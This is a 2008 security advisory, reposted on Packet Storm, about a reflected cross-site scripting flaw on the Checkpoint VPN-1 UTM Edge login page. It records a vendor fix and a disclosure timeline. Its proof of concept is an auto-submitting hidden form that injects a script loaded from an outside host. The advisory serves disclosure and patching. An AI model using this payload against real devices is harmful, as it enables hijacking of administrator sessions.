what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

checkpoint_080306.txt

checkpoint_080306.txt
Posted Mar 12, 2008
Authored by Henri Lindberg | Site louhi.fi

The Checkpoint VPN-1 UTM Edge suffers from a cross site scripting vulnerability. Details provided.

tags | exploit, xss
SHA-256 | d3fc5f4d681e57956fc9dd850febad7de761b3f1d8e7dd426ea6d1a607529fb6

checkpoint_080306.txt

Change Mirror Download
                           Louhi Networks
Security Advisory


Advisory: Checkpoint VPN-1 UTM Edge cross-site scripting
Release Date: 2008/03/06
Last Modified: 2008/03/06
Authors: Henri Lindberg, Associate of (ISC)²
[henri.lindberg@louhi.fi]

Application: Checkpoint VPN-1 Edge W Embedded NGX 7.0.48x
(patched in version 7.5.48)
Devices: Checkpoint VPN-1 UTM Edge
Attack type: Cross site scripting (non-persistent)
Risk: Low
Vendor Status: Vendor has released an updated version
References: http://www.louhi.fi/advisory/checkpoint_080306.txt


Overview:

Quote from http://www.checkpoint.com/
"VPN-1 UTM Edge appliances deliver unified threat management to
enterprises with branch offices and simplify security deployments
and manageability. VPN-1 UTM Edge appliances consolidate proven
enterprise-class technology into a single branch office solution
that does not compromise the corporate network and eliminates the
branch office as your weakest link. As part of Check Point's Unified
Security Architecture, VPN-1 UTM Edge can enforce a global security
policy and allows administrators to manage and update thousands of
appliances as easily as managing one."

Insufficient input validation and output encoding on the login page
allows attacker to perform html-injection by posting suitable string
to the login form handler. The injection leads to reflected
pre-authentication cross site scripting.


Details:
Form based authentication is used only when device is accessed using
HTTP. Authentication over HTTPS uses HTTP basic authentication.

The device does not accept the parameters in a GET request, POST
request has to be used instead - exploiting the XSS vulnerability
requires therefore a bit more effort compared to ordinary GET based
reflected cross site scripting vulnerability.

The current version can be checked from
http://xxx.xxx.xxx.xxx/pub/test.html where xxx.xxx.xxx.xxx is LAN IP
address of the device. The page also displays current product key.

Vendor response:

"Once users register the appliance and connect to the service center
(Safe@Office appliances), the latest firmware is automatically
downloaded to their appliance. For UTM-1 Edge appliances, the latest
firmware version can be downloaded from the Check Point download
center. Currently, this is version 7.5.48 that does not contain the
reported issue. We believe that customers are not exposed to this
issue."

Proof of Concept:

<html>
<body onload="document.f.submit()">
<form name="f" method="post" action="http://192.168.10.1"
style="display:none">

<input name="user" value="'<script/src=//l7.fi></script>">

</form>
</body>
</html>



Solution:

Update to version 7.5.48


Disclosure Timeline:

19. February 2008 - Contacted Checkpoint by email
20. February 2008 - Vendor response.
6. March 2008 - Advisory was released

Copyright 2008 Louhi Networks Oy. All rights reserved.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close